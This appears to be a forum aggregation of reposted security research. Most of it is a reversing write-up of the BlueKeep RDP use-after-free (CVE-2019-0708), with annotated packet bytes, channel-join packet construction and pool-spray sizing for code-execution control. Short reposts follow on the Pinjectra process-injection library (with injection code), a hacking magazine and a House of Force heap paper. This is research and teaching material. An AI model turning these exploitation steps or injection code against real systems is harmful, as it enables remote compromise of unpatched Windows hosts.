IOCTL 0x38002bL
chunk_PUSH_STACK_0x488 0xfffffa8006922a20L
chunk_PUSH_STACK_0xa8 0xfffffa8005ce0570L
FILE_OBJECT_2 0xfffffa8006335ae0L
IOCTL 0x38002bL
chunk_PUSH_STACK_0x488 0xfffffa8005f234e0L
chunk_PUSH_STACK_0xa8 0xfffffa8006875ba0L
FILE_OBJECT_2 0xfffffa8006335ae0L
IOCTL 0x38002bL
chunk_PUSH_STACK_0x488 0xfffffa8005daf010L
chunk_PUSH_STACK_0xa8 0xfffffa8006324c40L
FILE_OBJECT_2 0xfffffa8006335ae0L
IOCTL 0x38003bL
FILE_OBJECT_2 0xfffffa8006335ae0L
IOCTL 0x3800c7L
FILE_OBJECT_2 0xfffffa8006335ae0L
IOCTL 0x38244fL
FILE_OBJECT_2 0xfffffa8006335ae0L
IOCTL 0x38016fL
FILE_OBJECT_2 0xfffffa8006335ae0L
IOCTL 0x380173L
FILE_OBJECT_2 0xfffffa8006334c90L
FILE_OBJECT_2 0xfffffa8006335ae0L
IOCTL 0x38004bL
IO_STACK_LOCATION 0xfffffa8004ceb9d0L
IRP 0xfffffa8004ceb900L
FILE_OBJECT 0xfffffa8006334c90L
chunk_channel 0xfffffa8006923240L
saves RDI DESTINATION 0xfffffa8006923240L
FILE_OBJECT_2 0xfffffa8006335ae0L
IOCTL 0x381403L
FILE_OBJECT_2 0xfffffa8006335ae0L
IOCTL 0x380148L

I will put conditional breakpoints on each different IOCTL, to list the functions where each one ends up.
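For readability, the repeated entries in a log like the one above can be tallied with a few lines of Python (a convenience helper of mine, not part of the original tooling):

```python
from collections import Counter

def count_ioctls(log_text):
    """Count how many times each IOCTL code appears in a log where
    entries look like 'IOCTL 0x38002bL' (the trailing 'L' is the
    Python 2 long suffix and is stripped)."""
    words = log_text.split()
    codes = [words[i + 1].rstrip("L")
             for i, w in enumerate(words)
             if w == "IOCTL" and i + 1 < len(words)]
    return Counter(codes)
```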
The IOCTLs 0x380047, 0x38003b, 0x3800c7, 0x38244f, 0x38016f, 0x38004b and 0x381403 end up in _IcaCallStack.
image2019-7-15_8-12-31.png
These IOCTLs also reach _IcaCallSd.
image2019-7-15_8-13-6.png
IOCTL 0x380148 does nothing.
IOCTL 0x380173 reaches _IcaDriverThread
image2019-7-15_8-28-38.png
and this last one also reaches tdtcp_TdInputThread.
image2019-7-15_8-30-27.png
This function is used to receive the data sent by the user.

STEP 5) Receiving data

If we continue running to the data-entry breakpoint, we can see in the call stack that it comes from tdtcp!TdInputThread.
image2019-7-15_8-57-57.png
The server is now ready and waiting for our first send. We will analyze the packets and then return to the reversing.

STEP 6) Analyzing packets

Negotiate Request packet

03 00 00 13 0e e0 00 00 00 00 00 01 00 08 00 01 00 00 00

Step 6.png
Requested Protocol
image2019-7-15_10-28-28.png

Negotiation Response packet

The response packet is similar, only with Type = 0x2 (RDP Negotiation Response).
image2019-7-15_10-37-35.png

Connect Initial packet

The packet starts with "\x03\x00\xFF\xFF\x02\xf0\x80" (the \xFF\xFF are sizes to be calculated and patched in at the end).

Header
03 -> TPKT: TPKT version = 3
00 -> TPKT: Reserved = 0
FF -> TPKT: Packet length - high part
FF -> TPKT: Packet length - low part

X.224
02 -> X.224: Length indicator = 2
f0 -> X.224: Type = 0xf0 = Data TPDU
80 -> X.224: EOT

PDU
"7f 65" ..          -- BER: Application-Defined Type = APPLICATION 101
"82 FF FF" ..       -- BER: Type Length (calculated and patched at the end; 0x1b2 in the DoS sample)
"04 01 01" ..       -- Connect-Initial::callingDomainSelector
"04 01 01" ..       -- Connect-Initial::calledDomainSelector
"01 01 ff" ..       -- Connect-Initial::upwardFlag = TRUE
"30 19" ..          -- Connect-Initial::targetParameters (25 bytes)
"02 01 22" ..       -- DomainParameters::maxChannelIds = 34
"02 01 02" ..       -- DomainParameters::maxUserIds = 2
"02 01 00" ..       -- DomainParameters::maxTokenIds = 0
"02 01 01" ..
-- DomainParameters::numPriorities = 1
"02 01 00" ..       -- DomainParameters::minThroughput = 0
"02 01 01" ..       -- DomainParameters::maxHeight = 1
"02 02 ff ff" ..    -- DomainParameters::maxMCSPDUsize = 65535
"02 01 02" ..       -- DomainParameters::protocolVersion = 2
"30 19" ..          -- Connect-Initial::minimumParameters (25 bytes)
"02 01 01" ..       -- DomainParameters::maxChannelIds = 1
"02 01 01" ..       -- DomainParameters::maxUserIds = 1
"02 01 01" ..       -- DomainParameters::maxTokenIds = 1
"02 01 01" ..       -- DomainParameters::numPriorities = 1
"02 01 00" ..       -- DomainParameters::minThroughput = 0
"02 01 01" ..       -- DomainParameters::maxHeight = 1
"02 02 04 20" ..    -- DomainParameters::maxMCSPDUsize = 1056
"02 01 02" ..       -- DomainParameters::protocolVersion = 2
"30 1c" ..          -- Connect-Initial::maximumParameters (28 bytes)
"02 02 ff ff" ..    -- DomainParameters::maxChannelIds = 65535
"02 02 fc 17" ..    -- DomainParameters::maxUserIds = 64535
"02 02 ff ff" ..    -- DomainParameters::maxTokenIds = 65535
"02 01 01" ..       -- DomainParameters::numPriorities = 1
"02 01 00" ..       -- DomainParameters::minThroughput = 0
"02 01 01" ..       -- DomainParameters::maxHeight = 1
"02 02 ff ff" ..    -- DomainParameters::maxMCSPDUsize = 65535
"02 01 02" ..       -- DomainParameters::protocolVersion = 2
"04 82 FF FF" ..    -- Connect-Initial::userData (calculated at the end; 0x151 bytes in the DoS example)
"00 05" ..          -- object length = 5 bytes
"00 14 7c 00 01" .. -- object
"81 48" ..          -- ConnectData::connectPDU length = 0x48 bytes
"00 08 00 10 00 01 c0 00 44 75 63 61" .. -- PER encoded (ALIGNED variant of BASIC-PER) GCC Conference Create Request PDU
"81 FF" ..          -- UserData::value length (calculated at the end; 0x13a bytes in the DoS example)
#-------------
"01 c0 ea 00" ..    -- TS_UD_HEADER::type = CS_CORE (0xc001), length = 0xea bytes
"04 00 08 00" ..    -- TS_UD_CS_CORE::version = 0x00080004
"00 05" ..          -- TS_UD_CS_CORE::desktopWidth = 1280
"20 03" ..          -- TS_UD_CS_CORE::desktopHeight = 800
"01 ca" ..
-- TS_UD_CS_CORE::colorDepth = RNS_UD_COLOR_8BPP (0xca01)
"03 aa" ..          -- TS_UD_CS_CORE::SASSequence
"09 04 00 00" ..    -- TS_UD_CS_CORE::keyboardLayout = 0x409 = 1033 = English (US)
"28 0a 00 00" ..    -- TS_UD_CS_CORE::clientBuild = 2600
"45 00 4d 00 50 00 2d 00 4c 00 41 00 50 00 2d 00 " ..
"30 00 30 00 31 00 34 00 00 00 00 00 00 00 00 00 " .. -- TS_UD_CS_CORE::clientName = EMP-LAP-0014
"04 00 00 00" ..    -- TS_UD_CS_CORE::keyboardType
"00 00 00 00" ..    -- TS_UD_CS_CORE::keyboardSubtype
"0c 00 00 00" ..    -- TS_UD_CS_CORE::keyboardFunctionKey
"00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 " ..
"00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 " ..
"00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 " ..
"00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 " .. -- TS_UD_CS_CORE::imeFileName = ""
"01 ca" ..          -- TS_UD_CS_CORE::postBeta2ColorDepth = RNS_UD_COLOR_8BPP (0xca01)
"01 00" ..          -- TS_UD_CS_CORE::clientProductId
"00 00 00 00" ..    -- TS_UD_CS_CORE::serialNumber
"18 00" ..          -- TS_UD_CS_CORE::highColorDepth = 24 bpp
"07 00" ..          -- TS_UD_CS_CORE::supportedColorDepths = 24 bpp
"01 00" ..          -- TS_UD_CS_CORE::earlyCapabilityFlags
"00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 " ..
"00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 " ..
"00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 " ..
"00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 " .. -- TS_UD_CS_CORE::clientDigProductId
"07" ..             -- TS_UD_CS_CORE::connectionType = 7
"00" ..             -- TS_UD_CS_CORE::pad1octet
"01 00 00 00" ..    -- TS_UD_CS_CORE::serverSelectedProtocol
#---------------
"04 c0 0c 00" ..    -- TS_UD_HEADER::type = CS_CLUSTER (0xc004), length = 12 bytes
"15 00 00 00" ..    -- TS_UD_CS_CLUSTER::Flags = 0x15 (REDIRECTION_SUPPORTED | REDIRECTION_VERSION3)
"00 00 00 00" ..    -- TS_UD_CS_CLUSTER::RedirectedSessionID
#------------
"02 c0 0c 00" ..    -- TS_UD_HEADER::type = CS_SECURITY (0xc002), length = 12 bytes
"1b 00 00 00" ..    -- TS_UD_CS_SEC::encryptionMethods
"00 00 00 00" ..    -- TS_UD_CS_SEC::extEncryptionMethods
"03 c0 38 00" ..
-- TS_UD_HEADER::type = CS_NET (0xc003), length = 0x38 bytes

In this packet we need to set the user channels, and an MS_T120 channel needs to be included in the list.

Erect Domain packet

domain package1.png
image2019-7-15_11-25-10.png
0x04: type ErectDomainRequest
0x01: subHeight length = 1 byte
0x00: subHeight = 0
0x01: subInterval length = 1 byte
0x00: subInterval = 0

Attach User Request packet

image2019-7-15_13-17-26.png
image2019-7-15_13-25-21.png
We need to analyze the response:

03 00 00 0b 02 f0 80 2e 00 00 07

image2019-7-15_13-42-33.png
The last byte is the initiator; we need to strip it from the response to use in the next packets.

Channel Join Request packet

Building the packet:

xv1 = (chan_num) / 256
val = (chan_num) % 256
'\x03\x00\x00\x0c\x02\xf0\x80\x38\x00' + initiator + chr(xv1) + chr(val)

For channel 1003, for example:

xv1 = 1003 / 256 = 3
val = 1003 % 256 = 235
'\x03\x00\x00\x0c\x02\xf0\x80\x38\x00' + initiator + chr(3) + chr(235)

image2019-7-15_14-26-0.png
image2019-7-15_14-31-39.png
0x38: channelJoinRequest (14)
image2019-7-16_7-39-52.png
All channel join packets are similar; the only thing that changes is the last two bytes, which correspond to the channel number.

Channel Join Confirm response packet

The response was:

03 00 00 0f 02 f0 80 3e 00 00 07 03 eb 03 eb

0x3e: channelJoinConfirm (15)
image2019-7-16_8-1-54.png
result: rt-successful (0x0)
The packet has the same initiator and channelId values as the request for the same channel. When all the channels have answered the Join Request, the next packet sent is a Send Data Request.
image2019-7-22_11-46-44.png

Client Info PDU or Send Data Request packet

image2019-7-22_11-48-45.png
The remaining packets are important for the exploitation, so for now we will not show them in this first installment.

STEP 7) The vulnerability

The program allocates a channel named MS_T120 by default; the user can also set channels in the packets.
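The per-channel arithmetic shown earlier (chr(chan_num / 256), chr(chan_num % 256)) translates directly to Python 3, where struct handles the big-endian channel id. A sketch; the initiator byte is the one stripped from the Attach User response:

```python
import struct

def channel_join_request(initiator, chan_num):
    """Build an MCS Channel Join Request like the one above.
    Only the last two bytes (the channel number, big endian)
    change from one join to the next."""
    hdr = b"\x03\x00\x00\x0c"       # TPKT header, total length 12
    x224 = b"\x02\xf0\x80"          # X.224 Data TPDU
    mcs = b"\x38\x00" + initiator   # channelJoinRequest + initiator
    return hdr + x224 + mcs + struct.pack(">H", chan_num)
```

For channel 1003 the result ends with b"\x03\xeb", matching xv1 = 3, val = 235 above.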
This is the diff of the function named IcaBindVirtualChannels.
image2019-8-6_12-3-44.png
This is the patch for the Windows XP version; its logic is similar in every vulnerable Windows version. In the patched version, when the program compares the string MS_T120 with the name of each channel and they match, the pointer is forced into a fixed position of the channel table, using the value 0x1f to calculate where to store it. In the vulnerable version, the pointer is stored using the channel number to calculate the position in the channel table, so we end up with two pointers stored in different locations, both pointing to the same chunk.

If the user sets up a channel named MS_T120 and sends crafted data to that channel, the program allocates a chunk for it but stores two different pointers to that chunk. Afterwards the program frees the chunk, yet the data of the freed chunk is still accessed through the other pointer: a use-after-free vulnerability.

The chunk is freed here
image2019-8-6_13-50-59.png
Then the chunk is accessed after the free here; EBX will point to the freed chunk.
image2019-8-6_13-51-59.png
If a precise pool spray is performed with the correct chunk size, we can control the execution flow: EBX points to our chunk, and the value of EAX = [EBX+0x8c] is controlled by us as well.
image2019-8-6_13-55-45.png

STEP 8) Pool spray

There is a point in the code that lets us allocate data of a controlled size in the same pool type.
image2019-8-6_14-2-16.png
We can send a bunch of crafted packets to reach this point; if these packets have the right size, they can fill the freed chunk with our data. To get the right size it is necessary to look at the function IcaAllocateChannel. In Windows 7 32-bit, the size of each chunk of the pool spray should be 0xc8.
image2019-8-6_14-7-12.png
For Windows XP 32-bit, that size should be 0x8c.
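A single spray element for the Windows 7 32-bit case can be sketched as follows. The layout and filler are assumptions for illustration; only the chunk size 0xc8 and the [EBX+0x8c] offset come from the text above:

```python
import struct

def spray_element(fake_ptr, size=0xC8, eax_offset=0x8C):
    """Build one pool-spray buffer of `size` bytes (0xc8 on
    Windows 7 32-bit, per the text) where the dword at
    `eax_offset` is what the freed-chunk dereference
    EAX = [EBX+0x8c] will load."""
    buf = bytearray(b"\x41" * size)
    buf[eax_offset:eax_offset + 4] = struct.pack("<I", fake_ptr)
    return bytes(buf)
```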
image2019-8-6_14-8-47.png
The pool spray stays in this loop allocating chunks of the right size, and we can fill the freed chunk with our own data to control code execution at the CALL in IcaChannelInputInternal + 0x118.

Be happy
Ricardo Narvaja

Sursa: https://www.coresecurity.com/blog/low-level-reversing-bluekeep-vulnerability-cve-2019-0708?code=CMP-0000001929&ls=100000000&utm_campaign=core-security-emails&utm_content=98375609&utm_medium=social&utm_source=twitter&hss_channel=tw-17157238
    1 point
  12. Pinjectra

Pinjectra is a C/C++ library that implements Process Injection techniques (with focus on Windows 10 64-bit) in a "mix and match" style. Here's an example:

// CreateRemoteThread Demo + DLL Load (i.e., LoadLibraryA as Entry Point)
executor = new CodeViaCreateRemoteThread(
    new OpenProcess_VirtualAllocEx_WriteProcessMemory(
        (void *)"MsgBoxOnProcessAttach.dll",
        25,
        PROCESS_VM_WRITE | PROCESS_CREATE_THREAD | PROCESS_VM_OPERATION,
        MEM_COMMIT | MEM_RESERVE,
        PAGE_READWRITE),
    LoadLibraryA);

executor->inject(pid, tid);

It is also currently the only implementation of the "Stack Bomber" technique, a new process injection technique that works on Windows 10 64-bit with both CFG and CIG enabled.

Pinjectra and the "Stack Bomber" technique were released as part of the "Process Injection Techniques - Gotta Catch Them All" talk given at Black Hat USA 2019 and DEF CON 27 by Itzik Kotler and Amit Klein from SafeBreach Labs.

Version 0.1.0
License: BSD 3-Clause

Sursa: https://github.com/SafeBreach-Labs/pinjectra
    1 point
  13. What is Paged Out!?

Paged Out! is a new experimental (one article == one page) free magazine about programming (especially programming tricks!), hacking, security hacking, retro computers, modern computers, electronics, demoscene, and other similar topics.

It's made by the community for the community - the project is led by Gynvael Coldwind with multiple folks helping. And it's not-for-profit (though in time we hope it will be self-sustained) - this means that the issues will always be free to download, share and print. If you're interested in more details, check out our FAQ and About pages!

Download Issues

Cover art by ReFiend.
Issue #1: The first Paged Out! issue has arrived!
Paged Out! #1 (web PDF) (12MB)
Wallpaper (PNG, 30% transparency) (13MB)
Wallpaper (PNG, 10% transparency) (13MB)

Note: This is a "beta build" of the PDF, i.e. we will be re-publishing it with compatibility/size/menu/layout improvements multiple times in the next days. We'll also soon publish PDFs for printing (A4+bleed, US Letter+bleed) - our scripts don't build them yet.

Next issue

If you like our work, how about writing an article for Paged Out!? It's only one page after all - easy. Next issue progress tracker (unit of measurement: article count): Ready (0), In review (9), 50, 100 ("we got enough to finalize the issue!" zone). The article submission deadline for Issue #2 is 20 Oct 2019.
Call For Articles for Issue #2!
Cover art by Vlad Gradobyk (Insta, FB).

Notify me when the new issue is out!

Sure! There are a couple of ways to get notified when the issue is out:
You can subscribe to this newsletter e-mail group: pagedout-notifications (googlegroups.com) (be sure to select that you want e-mail notifications about every message when subscribing).
Or you can use the RSS / Atom feed for that group: see the group's "about" page for links to RSS / Atom.
We will only send e-mails to this group about new Paged Out! issues (both the free electronic ones and special issues, if we ever get to that).
No spam will be sent there and (if you subscribe to the group) your e-mail will be visible only to group owners. Sursa: https://pagedout.institute/?page=issues.php
    1 point
  14. Linux Heap House of Force Exploitation

August 10, 2019

In this paper, I introduce the reader to a heap metadata corruption attack against a recent version of the Linux heap allocator in glibc 2.27. The House of Force is a known technique that requires a buffer overflow to overwrite the top chunk size. An attacker must then be able to malloc an arbitrary size of memory. The result is that a later malloc can be made to return an arbitrary pointer. With appropriate application logic, this attack can be used in exploitation. The attack has been mitigated in the latest glibc 2.29 but is still exploitable in glibc 2.27, as shipped in Ubuntu 18.04 LTS.

Linux Heap House of Force Exploitation.PDF

Sursa: http://blog.infosectcbr.com.au/2019/08/linux-heap-house-of-force-exploitation.html
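The core arithmetic of the technique can be modeled in Python: a sketch of glibc's request2size rounding on 64-bit, used to compute the request that relocates the top chunk so the next malloc returns a chosen address. This is the textbook calculation under stated assumptions, not the paper's code:

```python
SIZE_SZ = 8               # 64-bit glibc
MALLOC_ALIGN_MASK = 0xF   # 16-byte alignment
MIN_CHUNK_SIZE = 0x20

def request2size(req):
    """Model of glibc's request2size(): user request -> chunk size."""
    return max((req + SIZE_SZ + MALLOC_ALIGN_MASK) & ~MALLOC_ALIGN_MASK,
               MIN_CHUNK_SIZE)

def house_of_force_request(top, target):
    """With the top chunk size overwritten to -1, return the request
    whose allocation moves the top chunk header to target - 0x10,
    so that the following malloc returns `target`.
    Assumes `top` and `target` are 16-byte aligned."""
    wanted_chunk = (target - 2 * SIZE_SZ) - top
    return wanted_chunk - SIZE_SZ   # undo request2size padding
```

After the oversized allocation, the new top sits at top + request2size(evil), and the next malloc returns that address plus 2 * SIZE_SZ, i.e. the target.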
    1 point